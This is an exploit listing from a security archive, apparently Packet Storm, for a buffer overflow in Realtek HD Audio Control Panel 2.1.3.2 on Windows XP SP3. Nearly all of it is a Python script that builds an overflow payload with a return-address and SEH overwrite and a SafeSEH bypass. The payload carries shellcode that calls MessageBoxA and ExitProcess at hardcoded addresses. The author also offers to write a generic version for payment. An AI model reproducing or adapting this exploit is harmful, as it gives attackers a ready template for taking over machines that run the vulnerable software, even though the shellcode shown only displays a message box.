Realtek HD Audio Control Panel 2.1.3.2 Buffer Overflow

2010-11-15T00:00:00
ID PACKETSTORM:95830
Type packetstorm
Reporter BraniX
Modified 2010-11-15T00:00:00

Description

                                        
                                            `# done by BraniX <branix@hackers.org.pl>  
# www.hackers.org.pl  
# found: 2010.08.24  
# tested on: Windows XP SP3 Home Edition  
# SafeSEH bypass  
  
# App. has classic buffer overflow vulnerability  
# it can be triggered by passing a too long argument  
# as a startup parameter. Shellcode can by run via classic  
# ret overwrite or SEH Handler overwrite ... so it's a mini-combo ;)  
  
# Ps. If you need a generic exploit ...  
# (no hardcoded VA'a), write it yourself ;) or 'donate few' $$$  
# we will c0de it for You ^^  
  
filepath = "C:\\ShellCode\\RTHDCPL 2.1.3.2 - Exploit.bin"  
f = open(filepath, "wb")  
  
f.write('A'*4)  
f.write('\x5E') # pop esi  
f.write('\x5E') # pop esi  
f.write('\xC3') # ret  
f.write('\x90') # nop  
  
f.write('[BraniX]')  
f.write('A'*448) # mock  
  
f.write('\xEB\x06') # jmp +6  
f.write('\x90') # nop  
f.write('\x90') # nop  
  
f.write('\x70\x01\xA5\x01') # pop; pop; ret; address  
  
f.write('\x83\xC1\x0C') # add ecx, 0Ch  
f.write('\x88\x01') # mov byte ptr [ecx], al  
f.write('\x83\xE9\x08') # sub ecx, 08  
f.write('\x50') # push eax  
f.write('\x51') # push ecx  
f.write('\x51') # push ecx  
f.write('\x50') # push eax  
f.write('\xE8\xC5\x08\x27\x7E') # call user32.MessageBoxA  
  
f.write('\x50') # push eax  
f.write('\xE8\xE7\xCB\x6E\x7C') # call kernel32.ExitProcess  
  
f.write('\xCC'*1500) # int 3's  
  
f.close()  
  
print "Done ..."  
  
`